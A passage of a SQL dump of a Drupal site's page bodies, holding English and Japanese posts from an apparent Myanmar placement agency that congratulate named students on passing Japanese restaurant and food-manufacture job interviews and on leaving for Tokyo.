data-entity-uuid=\"12109f45-4ed9-46f9-9a48-bb4ba36ed3d0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-dde55e97ef8570451473e9ba3c39964756ff73cce6ea1328cb68b967d9ea335e_f57cf6e077154eb6.jpg\" data-entity-uuid=\"8a2b75db-1149-475d-beaa-537ad6296fc0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-de1713cd42ca8420f980eec7f16f47b1a1ff1ee72432726e2ea27ed343cae8bf_da46f9ee7892a8f5.jpg\" data-entity-uuid=\"c96199f9-2828-4fbf-bd04-97c48cb5b0a1\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 111, 519, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2><p>KHIN KHIN KYAW、THET MYAT MYAT KHINE、HNIN THAZIN AUNG、WIN PYAE SHAN、YU YU NWAY の皆さん、特定外食ビザを取得して (午前 11:35) に日本の大都市 (東京) へ出発します。日本でより良い機会と健康を祈っています。</p></blockquote><img src=\"/sites/default/files/inline-images/0-02-01-09af1556503cf895dc500a57405f7aa13bda935f637a35f55b84172b11f2a2ae_d81fb0503c8b859b.jpg\" data-entity-uuid=\"1d399c1c-d9d3-448c-aa45-06b499fbf9b2\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-aa1636055b47104715df7e99e33ca9902c656871af49c4863a99ac3efcbc0279_227b57d23debae7c.jpg\" data-entity-uuid=\"f726a3fc-4a54-40eb-94b1-ed5ae6f33a7e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-c00edf6b50b4e5f2cd07650374690479f7dddefba6627e6fb334a01e67f6ea28_153d57af8899ba69.jpg\" data-entity-uuid=\"12109f45-4ed9-46f9-9a48-bb4ba36ed3d0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-dde55e97ef8570451473e9ba3c39964756ff73cce6ea1328cb68b967d9ea335e_f57cf6e077154eb6.jpg\" data-entity-uuid=\"8a2b75db-1149-475d-beaa-537ad6296fc0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-de1713cd42ca8420f980eec7f16f47b1a1ff1ee72432726e2ea27ed343cae8bf_da46f9ee7892a8f5.jpg\" data-entity-uuid=\"c96199f9-2828-4fbf-bd04-97c48cb5b0a1\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 112, 520, 'en', 0, '<blockquote><h2>CONGRATULATIONS!</h2></blockquote><p>Congrats to ADIN MIN MAW &amp; MIN KHANT KYAW for passing the Job Interview with TOKUTEI GAISHOKU (Restaurant)&nbsp;</p><img src=\"/sites/default/files/inline-images/ADIN%20MIN%20MAW.jpg\" data-entity-uuid=\"2712406c-f5a8-4478-9512-aaa7c0c73aef\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/MIN%20KHANT%20KYAW.jpg\" data-entity-uuid=\"108f5c40-9c4f-4f0d-817d-7efdc4dc3464\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 112, 521, 'en', 0, '<blockquote><h2>CONGRATULATIONS!</h2></blockquote><p>Congrats to ADIN MIN MAW &amp; MIN KHANT KYAW for passing the Job Interview with TOKUTEI GAISHOKU (Restaurant)&nbsp;</p><img src=\"/sites/default/files/inline-images/ADIN%20MIN%20MAW.jpg\" data-entity-uuid=\"2712406c-f5a8-4478-9512-aaa7c0c73aef\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/MIN%20KHANT%20KYAW.jpg\" data-entity-uuid=\"108f5c40-9c4f-4f0d-817d-7efdc4dc3464\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 112, 521, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p><strong>ADIN MIN MAW</strong> さんと <strong>MIN KHANT KYAW </strong>さんが TOKUTEI GAISHOKU (レストラン) の面接に合格しました。おめでとうございます。</p><img src=\"/sites/default/files/inline-images/ADIN%20MIN%20MAW.jpg\" data-entity-uuid=\"2712406c-f5a8-4478-9512-aaa7c0c73aef\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/MIN%20KHANT%20KYAW.jpg\" data-entity-uuid=\"108f5c40-9c4f-4f0d-817d-7efdc4dc3464\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 113, 522, 'en', 0, '<blockquote><h2>Congratulations!</h2></blockquote><p>Congratulations LWIN PHYO KO KO &amp; AUNG PYAE PAING &amp; EI KHIN &amp; YU YU NYEIN &amp; THAN HTUN NAING &amp; HTET LIN AUNG &amp; THAE KO KO &nbsp;For the departure to japan.Wishing for more success and good health in Tokyo.</p><img src=\"/sites/default/files/inline-images/0-02-01-5e6599f74ce48960506ef87cdf74ccde4b2c4022b1e9157e0b65b27ce328842b_35f4dbe1efe18b05.jpg\" data-entity-uuid=\"b0ddb77a-6f55-4442-9273-fa889527f7b6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-72d8d0346762fc04e52a3b41392da8fd3acd5015a12fe31b28c5ec097af9f638_80c9eef0de5a61ed.jpg\" data-entity-uuid=\"efb2aa85-d67d-4cbe-ac0b-5ca8e9f8913b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-8389e9859ff4de0960b080d64de4fece40f128cee0002f45cd85ffdee27efa3e_fbfb8883ae727313.jpg\" data-entity-uuid=\"fb550bf6-9d8d-49cb-b0b4-fef8e10c15be\" data-entity-type=\"file\"><p><img><img src=\"/sites/default/files/inline-images/0-02-01-ec6f67285620aebc46fcfc580ef126da63111fe2e6daba7c90c86f65dbff3d82_aedc66b32a612720.jpg\" data-entity-uuid=\"d6b083c7-c30e-4532-88a9-fcd441c7e05d\" data-entity-type=\"file\"></p>', '', 'full_html'),
('activities', 0, 113, 523, 'en', 0, '<blockquote><h2>Congratulations!</h2></blockquote><p>Congratulations LWIN PHYO KO KO &amp; AUNG PYAE PAING &amp; EI KHIN &amp; YU YU NYEIN &amp; THAN HTUN NAING &amp; HTET LIN AUNG &amp; THAE KO KO &nbsp;For the departure to japan.Wishing for more success and good health in Tokyo.</p><img src=\"/sites/default/files/inline-images/0-02-01-5e6599f74ce48960506ef87cdf74ccde4b2c4022b1e9157e0b65b27ce328842b_35f4dbe1efe18b05.jpg\" data-entity-uuid=\"b0ddb77a-6f55-4442-9273-fa889527f7b6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-72d8d0346762fc04e52a3b41392da8fd3acd5015a12fe31b28c5ec097af9f638_80c9eef0de5a61ed.jpg\" data-entity-uuid=\"efb2aa85-d67d-4cbe-ac0b-5ca8e9f8913b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-8389e9859ff4de0960b080d64de4fece40f128cee0002f45cd85ffdee27efa3e_fbfb8883ae727313.jpg\" data-entity-uuid=\"fb550bf6-9d8d-49cb-b0b4-fef8e10c15be\" data-entity-type=\"file\"><p><img><img src=\"/sites/default/files/inline-images/0-02-01-ec6f67285620aebc46fcfc580ef126da63111fe2e6daba7c90c86f65dbff3d82_aedc66b32a612720.jpg\" data-entity-uuid=\"d6b083c7-c30e-4532-88a9-fcd441c7e05d\" data-entity-type=\"file\"></p>', '', 'full_html'),
('activities', 0, 113, 523, 'ja', 0, '<blockquote><h2>おめでとう！</h2><p>LWIN PHYO KO KO &amp; AUNG PYAE PAING &amp; EI KHIN &amp; YU YU NYEIN &amp; THAN HTUN NAING &amp; HTET LIN AUNG &amp; THAE KO KO 日本へのご出発おめでとうございます。東京でのさらなる成功と健康をお祈りしています。</p></blockquote><img src=\"/sites/default/files/inline-images/0-02-01-5e6599f74ce48960506ef87cdf74ccde4b2c4022b1e9157e0b65b27ce328842b_35f4dbe1efe18b05.jpg\" data-entity-uuid=\"b0ddb77a-6f55-4442-9273-fa889527f7b6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-72d8d0346762fc04e52a3b41392da8fd3acd5015a12fe31b28c5ec097af9f638_80c9eef0de5a61ed.jpg\" data-entity-uuid=\"efb2aa85-d67d-4cbe-ac0b-5ca8e9f8913b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-8389e9859ff4de0960b080d64de4fece40f128cee0002f45cd85ffdee27efa3e_fbfb8883ae727313.jpg\" data-entity-uuid=\"fb550bf6-9d8d-49cb-b0b4-fef8e10c15be\" data-entity-type=\"file\"><p><img><img src=\"/sites/default/files/inline-images/0-02-01-ec6f67285620aebc46fcfc580ef126da63111fe2e6daba7c90c86f65dbff3d82_aedc66b32a612720.jpg\" data-entity-uuid=\"d6b083c7-c30e-4532-88a9-fcd441c7e05d\" data-entity-type=\"file\"></p>', '', 'full_html'),
('activities', 0, 114, 525, 'en', 0, '<blockquote><h2>CONGRATULATIONS !&nbsp;</h2></blockquote><p>Congratulations to YU MON AUNG &amp; MAY MYO KHAING for passing the Interview in TOKUTEI GAISHOKU (RESTAURANT)&nbsp;</p><img data-entity-uuid=\"9f7482db-c291-4768-b430-2517e13ac1e7\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/yu%20mon%20aung.jpg\"><img data-entity-uuid=\"3d4ee8e2-e6e4-445e-ba02-8eaa9e9e098b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/may%20myo%20khaing.jpg\">', '', 'full_html'),
('activities', 0, 114, 526, 'en', 0, '<blockquote><h2>CONGRATULATIONS !&nbsp;</h2></blockquote><p>Congratulations to YU MON AUNG &amp; MAY MYO KHAING for passing the Interview in TOKUTEI GAISHOKU (RESTAURANT)&nbsp;</p><img data-entity-uuid=\"9f7482db-c291-4768-b430-2517e13ac1e7\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/yu%20mon%20aung.jpg\"><img data-entity-uuid=\"3d4ee8e2-e6e4-445e-ba02-8eaa9e9e098b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/may%20myo%20khaing.jpg\">', '', 'full_html'),
('activities', 0, 114, 526, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p><strong>YU MON AUNG</strong>さんと<strong>MAY MYO KHAING</strong>さんがTOKUTEI GAISHOKU（レストラン）の面接に合格しました。おめでとうございます。</p><img src=\"/sites/default/files/inline-images/yu%20mon%20aung.jpg\" data-entity-uuid=\"9f7482db-c291-4768-b430-2517e13ac1e7\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/may%20myo%20khaing.jpg\" data-entity-uuid=\"3d4ee8e2-e6e4-445e-ba02-8eaa9e9e098b\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 115, 527, 'en', 0, '<blockquote><h2>CONGRATULATIONS!&nbsp;</h2></blockquote><p>Congratulations&nbsp;</p><ul><li>LI SOUNG OO</li><li>THANDAR MOE</li><li>KHU RICHARD</li><li>PYAE SONE AUNG&nbsp;</li></ul><p>For passing the Interview for Food Manufacture Work in JAPAN.</p><img data-entity-uuid=\"bd25967e-7b6e-46b2-a1d9-c86de77ebd5b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/khu%20richard_0.jpg\"><img data-entity-uuid=\"d952891d-b127-4a30-9005-867e578f58ee\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Li%20soung%20oo.jpg\"><img data-entity-uuid=\"cd5a1aa0-a314-459b-b5d6-bc837dff86ae\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/pyae%20sone%20aung.jpg\"><img data-entity-uuid=\"0a976ab1-60f5-46e7-807b-ae98f29b8429\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/thandar%20moe.jpg\">', '', 'full_html'),
('activities', 0, 115, 528, 'en', 0, '<blockquote><h2>CONGRATULATIONS!&nbsp;</h2></blockquote><p>Congratulations&nbsp;</p><ul><li>LI SOUNG OO</li><li>THANDAR MOE</li><li>KHU RICHARD</li><li>PYAE SONE AUNG&nbsp;</li></ul><p>For passing the Interview for Food Manufacture Work in JAPAN.</p><img data-entity-uuid=\"bd25967e-7b6e-46b2-a1d9-c86de77ebd5b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/khu%20richard_0.jpg\"><img data-entity-uuid=\"d952891d-b127-4a30-9005-867e578f58ee\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Li%20soung%20oo.jpg\"><img data-entity-uuid=\"cd5a1aa0-a314-459b-b5d6-bc837dff86ae\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/pyae%20sone%20aung.jpg\"><img data-entity-uuid=\"0a976ab1-60f5-46e7-807b-ae98f29b8429\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/thandar%20moe.jpg\">', '', 'full_html'),
('activities', 0, 115, 528, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p>おめでとうございます。</p><ul><li>LI SOUNG OO</li><li>THANDAR MOE</li><li>KHU RICHARD</li><li>PYAE SONE AUNG&nbsp;</li></ul><p>日本での食品製造職の面接に合格しました。</p><img src=\"/sites/default/files/inline-images/khu%20richard_0.jpg\" data-entity-uuid=\"bd25967e-7b6e-46b2-a1d9-c86de77ebd5b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/Li%20soung%20oo.jpg\" data-entity-uuid=\"d952891d-b127-4a30-9005-867e578f58ee\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/pyae%20sone%20aung.jpg\" data-entity-uuid=\"cd5a1aa0-a314-459b-b5d6-bc837dff86ae\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/thandar%20moe.jpg\" data-entity-uuid=\"0a976ab1-60f5-46e7-807b-ae98f29b8429\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 116, 529, 'en', 0, '<blockquote><h2>Images of 2th batch Resturtant Internship&nbsp;</h2></blockquote><p>Internships are a fantastic opportunity to gain hands-on experience and refine your skills under the guidance of seasoned professionals. I am confident that you will make the most of this opportunity and continue to excel in everything you do.</p><img src=\"/sites/default/files/inline-images/0-02-01-3f2baf66d0a137ebfa7758be8deb0d02f4985ae4f49885a04f3c718b68ee8a87_355c41511ecc3342.jpg\" data-entity-uuid=\"6905840e-3b7f-4da7-bdfa-d72bd2c49c83\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-7b1314190e83997c0265fe4a8e0cb6f00268455a422a2e42356a6feb4cb06fd7_8c1b1a778b2f078c.jpg\" data-entity-uuid=\"e0c13a42-6396-4a7a-8bb7-fdac5f07316f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-39fd9b20b3cc97839078384524af9322cffb6a8611ca8a005a1e7d3af97aa5da_ff1cfa085227deac.jpg\" data-entity-uuid=\"c1327073-522d-4a77-8af8-9bde7bfde392\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-150a301825e6de18cfadd78877b1c35d4c92262c93a8521c437ed00b8321a4dd_1431aab02860f3ee.jpg\" data-entity-uuid=\"ad81fb01-2217-43d0-9129-1dbf7eb53843\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-7790b6f0ead9f15aebf52270e3fad97c07e09ac41bc279a0e55317160a714a91_6c25777af47f352.jpg\" data-entity-uuid=\"6dc36c1b-83f0-4dd5-876a-2e517239825a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-83750c3cd206a9108fe122bef041987cde26578d3c95af86c74ffb08fea29ab9_cb025a850e8a54e3.jpg\" data-entity-uuid=\"09602c7a-1131-47f3-97d5-8a1060941e8c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-babd7b7242e03fbb9393f90b1a3493aa5e726d6187c5cab76e4e1c255bf9013c_2bc7f56483374f16.jpg\" data-entity-uuid=\"d4fab54c-b37f-4cf0-a797-a4a13321b01f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-d6cd0eab761f54357c9afbac8947e9d3fcb04964dbcdbb2a338f04c6e45a2e06_53f1a63d6dab64a1.jpg\" data-entity-uuid=\"08f1bb66-bce4-4a43-8ee4-db2449e63f31\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 116, 531, 'en', 0, '<blockquote><h2>Images of 2th batch Resturtant Internship&nbsp;</h2></blockquote><p>Internships are a fantastic opportunity to gain hands-on experience and refine your skills under the guidance of seasoned professionals. I am confident that you will make the most of this opportunity and continue to excel in everything you do.</p><img src=\"/sites/default/files/inline-images/0-02-01-3f2baf66d0a137ebfa7758be8deb0d02f4985ae4f49885a04f3c718b68ee8a87_355c41511ecc3342.jpg\" data-entity-uuid=\"6905840e-3b7f-4da7-bdfa-d72bd2c49c83\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-7b1314190e83997c0265fe4a8e0cb6f00268455a422a2e42356a6feb4cb06fd7_8c1b1a778b2f078c.jpg\" data-entity-uuid=\"e0c13a42-6396-4a7a-8bb7-fdac5f07316f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-39fd9b20b3cc97839078384524af9322cffb6a8611ca8a005a1e7d3af97aa5da_ff1cfa085227deac.jpg\" data-entity-uuid=\"c1327073-522d-4a77-8af8-9bde7bfde392\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-150a301825e6de18cfadd78877b1c35d4c92262c93a8521c437ed00b8321a4dd_1431aab02860f3ee.jpg\" data-entity-uuid=\"ad81fb01-2217-43d0-9129-1dbf7eb53843\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-7790b6f0ead9f15aebf52270e3fad97c07e09ac41bc279a0e55317160a714a91_6c25777af47f352.jpg\" data-entity-uuid=\"6dc36c1b-83f0-4dd5-876a-2e517239825a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-83750c3cd206a9108fe122bef041987cde26578d3c95af86c74ffb08fea29ab9_cb025a850e8a54e3.jpg\" data-entity-uuid=\"09602c7a-1131-47f3-97d5-8a1060941e8c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-babd7b7242e03fbb9393f90b1a3493aa5e726d6187c5cab76e4e1c255bf9013c_2bc7f56483374f16.jpg\" data-entity-uuid=\"d4fab54c-b37f-4cf0-a797-a4a13321b01f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-d6cd0eab761f54357c9afbac8947e9d3fcb04964dbcdbb2a338f04c6e45a2e06_53f1a63d6dab64a1.jpg\" data-entity-uuid=\"08f1bb66-bce4-4a43-8ee4-db2449e63f31\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 116, 531, 'ja', 0, '<blockquote><h2>第2回レストランインターンシップのイメージ&nbsp;<br>&nbsp;</h2><p>インターンシップは、経験豊かなプロフェッショナルの指導の下、実践的な経験を積み、スキルを磨く素晴らしい機会です。この機会を最大限に活用し、何事にも卓越し続けることを確信しています。</p></blockquote><img src=\"/sites/default/files/inline-images/0-02-01-3f2baf66d0a137ebfa7758be8deb0d02f4985ae4f49885a04f3c718b68ee8a87_355c41511ecc3342.jpg\" data-entity-uuid=\"6905840e-3b7f-4da7-bdfa-d72bd2c49c83\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-7b1314190e83997c0265fe4a8e0cb6f00268455a422a2e42356a6feb4cb06fd7_8c1b1a778b2f078c.jpg\" data-entity-uuid=\"e0c13a42-6396-4a7a-8bb7-fdac5f07316f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-39fd9b20b3cc97839078384524af9322cffb6a8611ca8a005a1e7d3af97aa5da_ff1cfa085227deac.jpg\" data-entity-uuid=\"c1327073-522d-4a77-8af8-9bde7bfde392\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-150a301825e6de18cfadd78877b1c35d4c92262c93a8521c437ed00b8321a4dd_1431aab02860f3ee.jpg\" data-entity-uuid=\"ad81fb01-2217-43d0-9129-1dbf7eb53843\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-7790b6f0ead9f15aebf52270e3fad97c07e09ac41bc279a0e55317160a714a91_6c25777af47f352.jpg\" data-entity-uuid=\"6dc36c1b-83f0-4dd5-876a-2e517239825a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-83750c3cd206a9108fe122bef041987cde26578d3c95af86c74ffb08fea29ab9_cb025a850e8a54e3.jpg\" data-entity-uuid=\"09602c7a-1131-47f3-97d5-8a1060941e8c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-babd7b7242e03fbb9393f90b1a3493aa5e726d6187c5cab76e4e1c255bf9013c_2bc7f56483374f16.jpg\" data-entity-uuid=\"d4fab54c-b37f-4cf0-a797-a4a13321b01f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-d6cd0eab761f54357c9afbac8947e9d3fcb04964dbcdbb2a338f04c6e45a2e06_53f1a63d6dab64a1.jpg\" data-entity-uuid=\"08f1bb66-bce4-4a43-8ee4-db2449e63f31\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 117, 530, 'en', 0, '<blockquote><h2>CONGRATULATIONS!</h2></blockquote><p>Congratulations <strong>EI EAINDRA AUNG</strong> for passing Interview in TOKUTEI GAISHOKU (Restaurant)&nbsp;</p><img data-entity-uuid=\"26365585-0816-4dbf-862a-1099948f6138\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/ei%20eaindra%20aung.jpg\">', '', 'full_html'),
('activities', 0, 117, 532, 'en', 0, '<blockquote><h2>CONGRATULATIONS!</h2></blockquote><p>Congratulations <strong>EI EAINDRA AUNG</strong> for passing Interview in TOKUTEI GAISHOKU (Restaurant)&nbsp;</p><img data-entity-uuid=\"26365585-0816-4dbf-862a-1099948f6138\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/ei%20eaindra%20aung.jpg\">', '', 'full_html'),
('activities', 0, 117, 532, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p><strong>EI EAINDRA AUNG</strong>さん、TOKUTEI GAISHOKU（レストラン）の面接に合格しました。おめでとうございます。</p><img src=\"/sites/default/files/inline-images/ei%20eaindra%20aung.jpg\" data-entity-uuid=\"26365585-0816-4dbf-862a-1099948f6138\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 118, 533, 'en', 0, '<blockquote><h2>CONGRATULATIONS!&nbsp;</h2></blockquote><p>Congratulations <strong>AUNG THURA</strong> for passing TOKUTEI GAISHOKU (Restaurant) !&nbsp;</p><img data-entity-uuid=\"3477f4ef-4abc-4909-a12d-35dbfef193ff\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/aung%20thura.jpg\">', '', 'full_html'),
('activities', 0, 118, 534, 'en', 0, '<blockquote><h2>CONGRATULATIONS!&nbsp;</h2></blockquote><p>Congratulations <strong>AUNG THURA</strong> for passing TOKUTEI GAISHOKU (Restaurant) !&nbsp;</p><img data-entity-uuid=\"3477f4ef-4abc-4909-a12d-35dbfef193ff\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/aung%20thura.jpg\">', '', 'full_html'),
('activities', 0, 118, 534, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p><strong>AUNG THURA</strong>さん、特定外食（レストラン）合格おめでとうございます！</p><img src=\"/sites/default/files/inline-images/aung%20thura.jpg\" data-entity-uuid=\"3477f4ef-4abc-4909-a12d-35dbfef193ff\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 119, 535, 'ja', 0, '<blockquote><h2>CONGRATULATIONS!</h2></blockquote><p>Congratulations <strong>THATOE AUNG</strong> for passing TOKUTEI GAISHOKU (Restaurant)&nbsp;</p><img data-entity-uuid=\"fa733f99-b77d-446a-a9ee-5a98eb807bc3\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/thatoe%20aung.jpg\">', '', 'full_html'),
('activities', 0, 119, 536, 'en', 0, '<blockquote><h2>CONGRATULATIONS!</h2></blockquote><p>Congratulations <strong>THATOE AUNG</strong> for passing TOKUTEI GAISHOKU (Restaurant)&nbsp;</p><img src=\"/sites/default/files/inline-images/thatoe%20aung.jpg\" data-entity-uuid=\"fa733f99-b77d-446a-a9ee-5a98eb807bc3\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 119, 537, 'en', 0, '<blockquote><h2>CONGRATULATIONS!</h2></blockquote><p>Congratulations <strong>THATOE AUNG</strong> for passing TOKUTEI GAISHOKU (Restaurant)&nbsp;</p><img src=\"/sites/default/files/inline-images/thatoe%20aung.jpg\" data-entity-uuid=\"fa733f99-b77d-446a-a9ee-5a98eb807bc3\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 119, 537, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p><strong>THATOE AUNGさん、</strong>TOKUTEI GAISHOKU（レストラン）合格おめでとうございます</p><img src=\"/sites/default/files/inline-images/thatoe%20aung.jpg\" data-entity-uuid=\"fa733f99-b77d-446a-a9ee-5a98eb807bc3\" data-entity-type=\"file\">', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('activities', 0, 120, 538, 'en', 0, '<blockquote><h2><strong>Boss\'s Treatment To Celebrate For The Interview Passed Student</strong></h2></blockquote><p><strong>Throughout this journey,You have been an unwavering source of encouragement and mentorship. Their belief in my potential and their invaluable advice truly made a difference in preparing for this milestone. Their leadership style fosters a positive work environment where everyone feels valued and motivated to excel.</strong></p><img src=\"/sites/default/files/inline-images/0-02-01-0c2d7cbb85052b32b9b9b2141188d6e1264592cb9faba90cdfa7b0e0e275254e_9cddaf25319c70b4.jpg\" data-entity-uuid=\"42450864-8900-4ee5-be49-71951d8e2707\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-1cb7f08548b9d8875b398fe974de7151e7cbfecfaaa3d5dc8afae9506e04b128_2b42e2d39d912d33.jpg\" data-entity-uuid=\"e5c60c22-aef1-424a-8da8-915020a115fd\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-3fa8e6b76d10c2bb84085b9bd26037db29c49e63c2a213c93f994b833011928c_81a2606370e44bd4.jpg\" data-entity-uuid=\"025f50cd-5493-4bf2-b158-db18e54ee88c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-4a68eaf2f2d17fae998a4249ad95aaaa856dd15ac9cea87a656439435bfa30c5_14deb95b28de4a03.jpg\" data-entity-uuid=\"da2f7e63-9559-44f1-906d-064bff7a87f6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-5d08eb28957488839cc9aa8d7f7fe410121efaeef650a1ece11d1624edbf086a_6aa711044fae7b6.jpg\" data-entity-uuid=\"7c4a740a-721c-49d7-93a1-6013c1acb046\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-07e7cccf7254751c6a31aeb7b5fab42bafcc09a41eb88ea492da6b5ec9fd6c91_c74e759ca6c36d5c.jpg\" data-entity-uuid=\"9a63bcca-1e29-4082-b750-4fb7c1a4c2e9\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-7c02ffb9fc9024e520739948a987a9379e63cde74b0503b60c1ae3db3a89c147_55e2a9cff905b5bd.jpg\" data-entity-uuid=\"c34a5086-3042-437f-a14a-4b8bc1438549\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-7ca2fd520735f2908ba21f9317c1b3f17a1ec4dd3794d056b4bebaead0e150a4_e76da50ac6e7da9.jpg\" data-entity-uuid=\"dfb440a7-6a47-49b6-acfb-39c4ea9d2824\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-055e37e956795c43bdd466a2a68b13ffb5aa6c26753424e9aee80253b2c85e96_66723606b1d13e7.jpg\" data-entity-uuid=\"63621b4e-69c9-428e-8d0e-288e59125e5d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-385acaa9bb806597960e6134f46b0b1100c10b2ec8d3f397d9b19b54a6f9e283_afe2b35c0e23caaa.jpg\" data-entity-uuid=\"c66ab6d9-dfff-44c5-82a5-1a400c211ecd\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-518eef8eec7ba3ee0e2fc7d22da0209264265c487f3a783ce53086d68f960490_49e213809bc69b92.jpg\" data-entity-uuid=\"9fa86d3b-367b-47be-8c91-d97eb232f00c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-3267c907a9213396559285ef2ff89589bea6feebc159bfae8c7afc8def669184_1532713942463601.jpg\" data-entity-uuid=\"182c1c4c-26bb-48f8-931c-2b27ba7d5995\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-477997d7024f7f23a3fc29753410617339ae86d8cf927182823774a2c386e32a_5aec6dc626b86c37.jpg\" data-entity-uuid=\"355ae490-43b3-4113-aa09-df893e415b99\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-d1cc1a642e8e8ecacf94405bdafc0147a61a06d7f25083687a2905ec3bac39b2_b7bb05875990f417.jpg\" data-entity-uuid=\"cca2db21-e1a5-44d0-877e-6688a0f2b994\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-dafe162cb611aaa55a5cd57f7abf5d59d0d21130dd5723e21589e98479ce51d1_aab1a82c80d13523.jpg\" data-entity-uuid=\"bc2507ab-a130-434e-91d8-cf2722c501fa\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-dc06d8870e524430ccb6d0f7b9e080b732456328b77873cb14b9bac6131853d0_3ce7fa2e748d1400.jpg\" data-entity-uuid=\"da7c42e2-128e-4556-8597-ad3b1c415a28\" 